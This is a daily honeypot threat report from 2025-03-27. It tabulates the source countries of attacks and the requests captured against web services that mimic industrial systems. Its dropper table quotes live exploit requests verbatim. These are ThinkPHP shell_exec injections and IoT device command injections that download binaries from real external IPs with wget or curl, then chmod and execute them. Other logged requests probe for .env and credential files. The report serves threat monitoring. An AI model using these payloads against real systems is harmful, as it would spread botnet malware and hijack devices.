Skip to main content
  1. Daily-Posts/

Report: 2025-03-27

·530 words·
Repport Daily
Author
Shoggoth Industries
Table of Contents

Daily Report: 2025-03-27
#

Interaction report on http service of various honeypot around the world.

ot_simplified_report
#

Simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_countrytargeted_country
FRSingapore
USDubai
CNGeorgia
DE

botnet_dropper_behaviour
#

List of requests suspected of having stage 1 dropper behavior (programs designed to extract other files from their own code)

remote_addrrequest
175.107.1.22127;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0
117.72.77.99GET /shell?cd+/tmp;rm+-rf+*;wget+ 129.159.107.197/jaws;sh+/tmp/jaws HTTP/1.1
87.121.84.41POST /device.rsp?opt=sys&cmd=S_O_S_T_R_E_A_MAX&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20-rf%20parm7%3B%20wget%20http%3A%2F%2F193.32.162.27%2Fbins%2Fparm7%3B%20chmod%20777%20parm7%3B%20.%2Fparm7%20sex HTTP/1.1
31.170.22.205GET /cgi-bin/live_api.cgi?page=satellite_list&id=&ip=$(chmod+777+/tmp;rm+-rf+/tmp/*;cd+/tmp;wget+http://31.170.22.205/dl18;curl+-O+http://31.170.22.205/dl18;sh+dl18) HTTP/1.1
211.143.108.124GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://5.255.115.56/x86_64 -O /tmp/.phpdsds; chmod 777 /tmp/.phpdsds; /tmp/.phpdsds php.x86’ HTTP/1.1
185.191.127.222POST /device.rsp?opt=sys&cmd=S_O_S_T_R_E_A_MAX&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20arm7%3B%20wget%20http%3A%2F%2F45.87.43.37%2Farm7%3B%20chmod%20777%20%2A%3B%20.%2Farm7%20tbk HTTP/1.1
222.133.54.222GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘rm -rf bejv86; wget http://176.65.134.201/bejv86 -O /tmp/.Aqua; chmod 777 /tmp/.Aqua; /tmp/.Aqua thinkphp.selfrep’ HTTP/1.1
180.153.27.22GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://5.255.115.56/x86_64 -O /tmp/.phpdsds; chmod 777 /tmp/.phpdsds; /tmp/.phpdsds php.x86’ HTTP/1.1
61.130.11.82GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://5.255.115.56/x86_64 -O /tmp/.phpdsds; chmod 777 /tmp/.phpdsds; /tmp/.phpdsds php.x86’ HTTP/1.1
58.58.30.134GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://5.255.115.56/x86_64 -O /tmp/.phpdsds; chmod 777 /tmp/.phpdsds; /tmp/.phpdsds php.x86’ HTTP/1.1
84.195.192.75GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://5.255.115.56/x86_64 -O /tmp/.phpdsds; chmod 777 /tmp/.phpdsds; /tmp/.phpdsds php.x86’ HTTP/1.1

request
#

List of requests of the day that have never been detected, other requests that have already been detected and archived in the request database.

number_of_occurencerequest
1435GET /static/css/chunk-fffbd800.3e1a8b72.css HTTP/1.1
2382POST /device.rsp?opt=sys&cmd=S_O_S_T_R_E_A_MAX&mdb=sos&mdc=busybox%20reboot%20&&%20reboot HTTP/1.1
2801GET /PbBh HTTP/1.1
2851GET /ARVt HTTP/1.1
3071\x00\x0E\x08\xB2\x1F\xE8\x07\xE0\xD8\xD0\xBE\x00\x00\x00\x00\x00
3081\x00\x0E8\xB2\x1F\xE8\x07\xE0\xD8\xD0\xBE\x00\x00\x00\x00\x00
3321GET /config.phpinfo HTTP/1.1
3851\x00\x0E\x08v\xAELWH1{\xA6\x00\x00\x00\x00\x00
3951\x00\x0E8v\xAELWH1{\xA6\x00\x00\x00\x00\x00
4231POST /cgi-bin/cgi_main.cgi HTTP/1.1
4461GET /socket.io/1/?t=1743038285763 HTTP/1.1
4751GET /lib/.env HTTP/1.1
5011GET /OdinHttpCall1743114175 HTTP/1.1
5161PORT 81, HEAD /robots.txt HTTP/1.0
5241GET /Nmap/folder/check1743111188 HTTP/1.1
5251GET /NmapUpperCheck1743111188 HTTP/1.1
5261GET /nmaplowercheck1743111188 HTTP/1.1
5311GET /odinhttpcall1743050364 HTTP/1.1
5481GET /Odin/http/call1743114175 HTTP/1.1
5571GET /odinhttpcall1743114175 HTTP/1.1
5581GET /OdinHttpCall1743050364 HTTP/1.1
5611GET /stage/.env HTTP/1.1
5671GET /Odin/http/call1743050364 HTTP/1.1
6651GET /credentials HTTP/1.1
6871GET /API/.env HTTP/1.1
6951GET /skin/default_1/images/logo.png HTTP/1.1
6971GET /image/lgbg.jpg HTTP/1.1
7061GET /nobody/favicon.ico HTTP/1.1
7111GET /Odin/http/call1743060215 HTTP/1.1
7121GET /OdinHttpCall1743060215 HTTP/1.1
7131GET /odinhttpcall1743060215 HTTP/1.1
7161GET /infos/ HTTP/1.1

country_iso_code
#

List of country names and number of requests received by IPs located in these countries

number_of_occurencecountry_iso_code
0647NL
1475FR
2411US
3408BG
4231DE
5161GB
6161CN
792HK
882PL
954SG
1050CH
1147VN
1235JP
1326SC
1425RU
1517IN
1613CA
1712GE
1811NG
1911AU
2010BE
2110GH
229NO
238ID
247IR
257AZ
267LT
277PT
286TH
296ZA
305TR
314BR
323LV
333UA
343IE
352RO
362KR
371BD
381PH
391PK
401PE
411MD
421MC
431AE
441YE
451IT
461CO

Related

Report: 2025-03-26
·2766 words
Repport Daily
Report: 2025-03-25
·553 words
Repport Daily
Report: 2025-03-24
·720 words
Repport Daily